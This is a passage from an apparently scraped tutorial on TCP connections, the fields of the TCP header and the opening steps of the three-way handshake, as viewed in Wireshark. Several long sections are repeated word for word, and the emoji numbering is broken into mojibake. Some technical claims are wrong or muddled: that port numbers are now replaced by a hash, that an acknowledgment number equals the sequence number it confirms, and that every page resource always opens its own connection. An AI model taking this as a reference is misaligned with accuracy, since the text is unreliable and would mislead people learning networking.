> That is, when you open the website page, the browser makes the first TCP connection and receives the source code of the web page. In this code, the browser finds links to files of styles, scripts, images - a new TCP connection is launched for each of these files.
> Therefore, when analyzing traffic in Wireshark when you open even one web page, you will see many started and completed TCP connections.
π¦WHY WE SHOULD USE TCP CONNECTIONS ?
> What is 1 TCP connection
Before examining the structure of the TCP packet header, letβs figure out what 1 TCP connection is - this will help to more clearly understand what exactly we are analyzing in Wireshark and how many TCP connections we need to look for. For example, how many TCP connections are involved when opening 1 page of a website? A typical website consists of 1 page of HTML code, several pages of cascading style sheets for CSS and JavaScript files, as well as a couple of dozens of image files. So, to receive each of these files, a new TCP connection is created. For each of these connections, a three-stage handshake is performed - this is to the question of what costs, "overhead" TCP carries.
> That is, when you open the website page, the browser makes the first TCP connection and receives the source code of the web page. In this code, the browser finds links to files of styles, scripts, images - a new TCP connection is launched for each of these files.
> Therefore, when analyzing traffic in Wireshark when you open even one web page, you will see many started and completed TCP connections.
1οΈβ£Source port - bits 0-15. This is the packet source port. The source port was originally associated directly with the process in the sending system. Today, we use a hash between the IP addresses and the destination and source ports to achieve this uniqueness, which we can associate with a single application or program.
2οΈβ£Destination port - bits 16-31. This is the destination port of the TCP packet. As with the source port, it was initially directly connected to the process in the receiving system. Today, a hash is used instead, which allows us to have more open connections at the same time. When the packet is received, the destination and source ports return in response back to the original sending host, so that the destination port is now the source port and the source port is the destination port.
3οΈβ£The source port and destination port do not have to be the same: for example, if a request is made to the 80th port of the server, then this request may come, for example, from port 34054.
4οΈβ£The port numbers on the server can be used either standard or arbitrary.
5οΈβ£Sequence number - bits 32-63. The sequence number field is used to set the number in each TCP packet so that the TCP stream can be properly ordered (for example, packets are brought to the correct order). The serial number is then returned in the ACK field to confirm that the packet was received correctly.
Indicates the number of bytes transmitted, and each byte of payload transferred increases this value by 1.
6οΈβ£If the SYN flag is set (session is being established), then the field contains the initial serial number - ISN (Initial Sequence Number). For security purposes, this value is randomly generated and can be between 0 and 2 32 -1 (4294967295). The first byte of payload in the established session will be ISN + 1.
7οΈβ£Otherwise, if SYN is not set, the first byte of data transmitted in this packet has this serial number.
8οΈβ£Confirmation number (Acknowledgment Number (ACK SN)) - bits 64-95. This field is used when we acknowledge a specific packet received by the host. For example, we receive a packet with one established sequence number, and if everything is in order with the packet, we respond with an ACK packet with a confirmation number equal to the original sequence number.
If the ACK flag is set, this field contains the octet number that the sender of this segment wants to receive. This means that all previous octets (with numbers from ISN + 1 to ACK-1 inclusive) were successfully received.
9οΈβ£Each side calculates its own Sequence number for the transmitted data and separately Acknowledgment number for the received data. Accordingly, the Sequence number of each side corresponds to the Acknowledgment number of the other side.
πThe length of the header (data offset) is bits 96-99. This field indicates the length of the TCP packet header and where the actual data begins (payload). The field is 4 bits in size and indicates the TCP header in 32-bit words. The header should always end with an even 32-bit border, even with various options set (options may not be available at all, or their number may vary). This is possible thanks to the Padding field at the very end of the TCP header.
1οΈβ£1οΈβ£The minimum header size is 5 words, and the maximum is 15 words, which gives a minimum size of 20 bytes and a maximum of 60 bytes, which allows you to use up to 40 bytes of options in the header. This field received this name (data offset) because it also shows the location of the actual data from the beginning of the TCP segment.
1οΈβ£2οΈβ£So, the length of the header determines the offset of the payload relative to the beginning of the segment. For example, a Data offset of 1111 indicates that the title occupies fifteen 32-bit words (15 lines * 32 bits in each line / 8 bits = 60 bytes).
2οΈβ£Destination port - bits 16-31. This is the destination port of the TCP packet. As with the source port, it was initially directly connected to the process in the receiving system. Today, a hash is used instead, which allows us to have more open connections at the same time. When the packet is received, the destination and source ports return in response back to the original sending host, so that the destination port is now the source port and the source port is the destination port.
3οΈβ£The source port and destination port do not have to be the same: for example, if a request is made to the 80th port of the server, then this request may come, for example, from port 34054.
4οΈβ£The port numbers on the server can be used either standard or arbitrary.
5οΈβ£Sequence number - bits 32-63. The sequence number field is used to set the number in each TCP packet so that the TCP stream can be properly ordered (for example, packets are brought to the correct order). The serial number is then returned in the ACK field to confirm that the packet was received correctly.
Indicates the number of bytes transmitted, and each byte of payload transferred increases this value by 1.
6οΈβ£If the SYN flag is set (session is being established), then the field contains the initial serial number - ISN (Initial Sequence Number). For security purposes, this value is randomly generated and can be between 0 and 2 32 -1 (4294967295). The first byte of payload in the established session will be ISN + 1.
7οΈβ£Otherwise, if SYN is not set, the first byte of data transmitted in this packet has this serial number.
8οΈβ£Confirmation number (Acknowledgment Number (ACK SN)) - bits 64-95. This field is used when we acknowledge a specific packet received by the host. For example, we receive a packet with one established sequence number, and if everything is in order with the packet, we respond with an ACK packet with a confirmation number equal to the original sequence number.
If the ACK flag is set, this field contains the octet number that the sender of this segment wants to receive. This means that all previous octets (with numbers from ISN + 1 to ACK-1 inclusive) were successfully received.
9οΈβ£Each side calculates its own Sequence number for the transmitted data and separately Acknowledgment number for the received data. Accordingly, the Sequence number of each side corresponds to the Acknowledgment number of the other side.
πThe length of the header (data offset) is bits 96-99. This field indicates the length of the TCP packet header and where the actual data begins (payload). The field is 4 bits in size and indicates the TCP header in 32-bit words. The header should always end with an even 32-bit border, even with various options set (options may not be available at all, or their number may vary). This is possible thanks to the Padding field at the very end of the TCP header.
1οΈβ£1οΈβ£The minimum header size is 5 words, and the maximum is 15 words, which gives a minimum size of 20 bytes and a maximum of 60 bytes, which allows you to use up to 40 bytes of options in the header. This field received this name (data offset) because it also shows the location of the actual data from the beginning of the TCP segment.
1οΈβ£2οΈβ£So, the length of the header determines the offset of the payload relative to the beginning of the segment. For example, a Data offset of 1111 indicates that the title occupies fifteen 32-bit words (15 lines * 32 bits in each line / 8 bits = 60 bytes).
π¦TCP Session
TCP handshake (establishing a TCP connection)
> TCP uses a three-step handshake to establish a connection.
1) Connection can be made only if the other side is listening on the port to which the connection will be made: for example, the web server is listening on ports 80 and 443. That is, this is not covered by a handshake, but before the client tries to connect to the server, the server must first connect to the port and start listening to it to open it for connections: this is called passive opening. Once a passive discovery is established, the client can initiate an active discovery. To establish a connection, a three-stage (or three-stage) handshake occurs:
2) The first stage, sending a packet with the SYN flag enabled : active opening is performed by the client sending SYN to the server. The client sets the sequence number of the segment to a random value A.
Note that by default, Wireshark shows the relative value of the sequence number (Sequence number), just below you can also see the real value (shown as raw ).
TCP handshake (establishing a TCP connection)
> TCP uses a three-step handshake to establish a connection.
1) Connection can be made only if the other side is listening on the port to which the connection will be made: for example, the web server is listening on ports 80 and 443. That is, this is not covered by a handshake, but before the client tries to connect to the server, the server must first connect to the port and start listening to it to open it for connections: this is called passive opening. Once a passive discovery is established, the client can initiate an active discovery. To establish a connection, a three-stage (or three-stage) handshake occurs:
2) The first stage, sending a packet with the SYN flag enabled : active opening is performed by the client sending SYN to the server. The client sets the sequence number of the segment to a random value A.
Note that by default, Wireshark shows the relative value of the sequence number (Sequence number), just below you can also see the real value (shown as raw ).